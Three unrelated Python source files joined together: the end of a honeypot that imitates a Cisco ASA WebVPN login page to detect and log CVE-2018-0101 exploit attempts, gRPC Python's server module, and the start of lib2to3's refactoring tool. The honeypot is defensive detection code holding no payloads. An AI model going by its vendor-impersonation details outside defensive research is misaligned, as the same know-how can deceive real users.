if self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.startswith('/+CSCOE+/logon.html?') and 'reason=1' in self.path:
self.wfile.write(self.send_file('logon_failure').getvalue())
return
SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
data_len = int(self.headers.get('Content-length', 0))
data = self.rfile.read(data_len) if data_len else b''
body = self.RESPONSE
if self.EXPLOIT_STRING in data:
xml = ElementTree.fromstring(data)
payloads = []
for x in xml.iter('host-scan-reply'):
payloads.append(x.text)
self.alert_function(self.client_address[0], self.client_address[1], payloads)
elif self.path == '/':
self.redirect('/+webvpn+/index.html')
return
elif self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.split('?', 1)[0] == '/+webvpn+/index.html':
with open(os.path.join(self.basepath, 'asa', "logon_redir.html"), 'rb') as fh:
body = fh.read()
self.send_response(200)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(body)
return
def send_file(self, filename, status_code=200, headers=[]):
try:
with open(os.path.join(self.basepath, 'asa', filename), 'rb') as fh:
body = fh.read()
self.send_response(status_code)
for k, v in headers:
self.send_header(k, v)
if status_code == 200:
for k, v in header_split("""
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; secure
X-Transcend-Version: 1
"""):
self.send_header(k, v)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
return BytesIO(body)
except IOError:
return self.send_file('wrong_url.html', 404)
def log_message(self, format, *args):
self.logger.debug("%s - - [%s] %s" %
(self.client_address[0],
self.log_date_time_string(),
format % args))
self.hpfl.log('debug', "%s - - [%s] %s" %
(self.client_address[0],
self.log_date_time_string(),
format % args))
def handle_one_request(self):
"""Handle a single HTTP request.
Overriden to not send 501 errors
"""
self.close_connection = True
try:
self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
self.close_connection = 1
return
if not self.raw_requestline:
self.close_connection = 1
return
if not self.parse_request():
# An error code has been sent, just exit
return
mname = 'do_' + self.command
if not hasattr(self, mname):
self.log_request()
self.close_connection = True
return
method = getattr(self, mname)
method()
self.wfile.flush() # actually send the response if not already done.
except socket.timeout as e:
# a read or a write timed out. Discard this connection
self.log_error("Request timed out: %r", e)
self.close_connection = 1
return
if __name__ == '__main__':
import click
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
logger.info('info')
@click.command()
@click.option('-h', '--host', default='0.0.0.0', help='Host to listen')
@click.option('-p', '--port', default=8443, help='Port to listen', type=click.INT)
@click.option('-i', '--ike-port', default=5000, help='Port to listen for IKE', type=click.INT)
@click.option('-s', '--enable_ssl', default=False, help='Enable SSL', is_flag=True)
@click.option('-c', '--cert', default=None, help='Certificate File Path (will generate self signed '
'cert if not supplied)')
@click.option('-v', '--verbose', default=False, help='Verbose logging', is_flag=True)
# hpfeeds options
@click.option('--hpfserver', default=os.environ.get('HPFEEDS_SERVER'), help='HPFeeds Server')
@click.option('--hpfport', default=os.environ.get('HPFEEDS_PORT'), help='HPFeeds Port', type=click.INT)
@click.option('--hpfident', default=os.environ.get('HPFEEDS_IDENT'), help='HPFeeds Ident')
@click.option('--hpfsecret', default=os.environ.get('HPFEEDS_SECRET'), help='HPFeeds Secret')
@click.option('--hpfchannel', default=os.environ.get('HPFEEDS_CHANNEL'), help='HPFeeds Channel')
@click.option('--serverid', default=os.environ.get('SERVERID'), help='Verbose logging')
def start(host, port, ike_port, enable_ssl, cert, verbose, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid):
"""
A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101,
a DoS and remote code execution vulnerability
"""
hpfl=hpflogger(hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose)
def alert(cls, host, port, payloads):
logger.critical({
'src': host,
'spt': port,
'data': payloads,
})
#log to hpfeeds
hpfl.log("critical", {
'src': host,
'spt': port,
'data': payloads,
})
if verbose:
logger.setLevel(logging.DEBUG)
requestHandler = WebLogicHandler
requestHandler.alert_function = alert
requestHandler.logger = logger
requestHandler.hpfl = hpfl
def log_date_time_string():
"""Return the current time formatted for logging."""
now = time.time()
year, month, day, hh, mm, ss, x, y, z = time.localtime(now)
s = "%02d/%3s/%04d %02d:%02d:%02d" % (day, requestHandler.monthname[month], year, hh, mm, ss)
return s
def ike():
ike_server.start(host, ike_port, alert, logger, hpfl)
t = threading.Thread(target=ike)
t.daemon = True
t.start()
httpd = HTTPServer((host, port), requestHandler)
if enable_ssl:
import ssl
if not cert:
import gencert
cert = gencert.gencert()
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
logger.info('Starting server on port {:d}/tcp, use <Ctrl-C> to stop'.format(port))
hpfl.log('info', 'Starting server on port {:d}/tcp, use <Ctrl-C> to stop'.format(port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
logger.info('Stopping server.')
hpfl.log('info', 'Stopping server.')
httpd.server_close()
start()
|
_server.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import grpc
from grpc import _common
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_EMPTY_METADATA = cygrpc.Metadata(())
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].received_message.bytes()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple(
'_HandlerCallDetails', ('method', 'invocation_metadata',)),
grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(
_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata), effective_code,
effective_details, _EMPTY_FLAGS),
)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata), effective_code,
effective_details, _EMPTY_FLAGS),
)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[0].received_cancelled:
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request, request_deserializer)
with state.condition:
if request is None:
_abort(
state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(self._rpc_event.request_call_details.deadline - time.time(), 0)
def cancel(self):
self._rpc_event.operation_call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return _common.application_metadata(self._rpc_event.request_metadata)
def peer(self):
return _common.decode(self._rpc_event.operation_call.peer())
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.operation_send_initial_metadata(
_common.cygrpc_metadata(initial_metadata), _EMPTY_FLAGS)
self._rpc_event.operation_call.start_server_batch(
cygrpc.Operations((operation,)),
_send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = _common.cygrpc_metadata(
trailing_metadata)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
cygrpc.Operations((cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(self._state, self._call, self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
start_server_batch_result = rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(
state, rpc_event.operation_call, request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.request_call_details.method)
_abort(
state, rpc_event.operation_call,
cygrpc.StatusCode.unimplemented, _common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(
state, rpc_event.operation_call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(
_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_message(serialized_response, _EMPTY_FLAGS),
)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (
cygrpc.operation_send_message(serialized_response, _EMPTY_FLAGS),
)
token = _SEND_MESSAGE_TOKEN
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations), _send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
trailing_metadata = _common.cygrpc_metadata(state.trailing_metadata)
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.operation_send_status_from_server(
trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.operation_send_initial_metadata(
_EMPTY_METADATA, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(cygrpc.operation_send_message(
serialized_response, _EMPTY_FLAGS))
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(
rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
return
def _stream_response_in_pool(
rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state, serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(
rpc_event, state, method_handler.request_deserializer)
thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.unary_unary,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(
rpc_event, state, method_handler.request_deserializer)
thread_pool.submit(
_stream_response_in_pool, rpc_event, state, method_handler.unary_stream,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(
state, rpc_event.operation_call, method_handler.request_deserializer)
thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.stream_unary,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(
state, rpc_event.operation_call, method_handler.request_deserializer)
thread_pool.submit(
_stream_response_in_pool, rpc_event, state, method_handler.stream_stream,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(
_HandlerCallDetails(
_common.decode(rpc_event.request_call_details.method),
rpc_event.request_metadata))
if method_handler is not None:
return method_handler
else:
return None
def _handle_unrecognized_method(rpc_event):
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_EMPTY_METADATA, cygrpc.StatusCode.unimplemented,
b'Method not found!', _EMPTY_FLAGS),
)
rpc_state = _RPCState()
rpc_event.operation_call.start_server_batch(
operations, lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),)),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
_handle_stream_stream(rpc_event, state, method_handler, thread_pool)
else:
_handle_stream_unary(rpc_event, state, method_handler, thread_pool)
else:
if method_handler.response_streaming:
_handle_unary_stream(rpc_event, state, method_handler, thread_pool)
else:
_handle_unary_unary(rpc_event, state, method_handler, thread_pool)
return state
def _handle_call(rpc_event, generic_handlers, thread_pool):
if rpc_event.request_call_details.method is not None:
method_handler = _find_method_handler(rpc_event, generic_handlers)
if method_handler is None:
return _handle_unrecognized_method(rpc_event)
else:
return _handle_with_method_handler(rpc_event, method_handler, thread_pool)
else:
return None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
def __init__(self, completion_queue, server, generic_handlers, thread_pool):
self.lock = threading.Lock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address, server_credentials._credentials)
def _request_call(state):
state.server.request_call(
state.completion_queue, state.completion_queue, _REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _serve(state):
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
rpc_state = _handle_call(
event, state.generic_handlers, state.thread_pool)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
def __init__(self, thread_pool, generic_handlers):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server()
server.register_completion_queue(completion_queue)
self._state = _ServerState(
completion_queue, server, generic_handlers, thread_pool)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state, _common.encode(address), server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leafs
if pat.type is None:
raise _EveryNode
return {pat.type}
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping optional fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
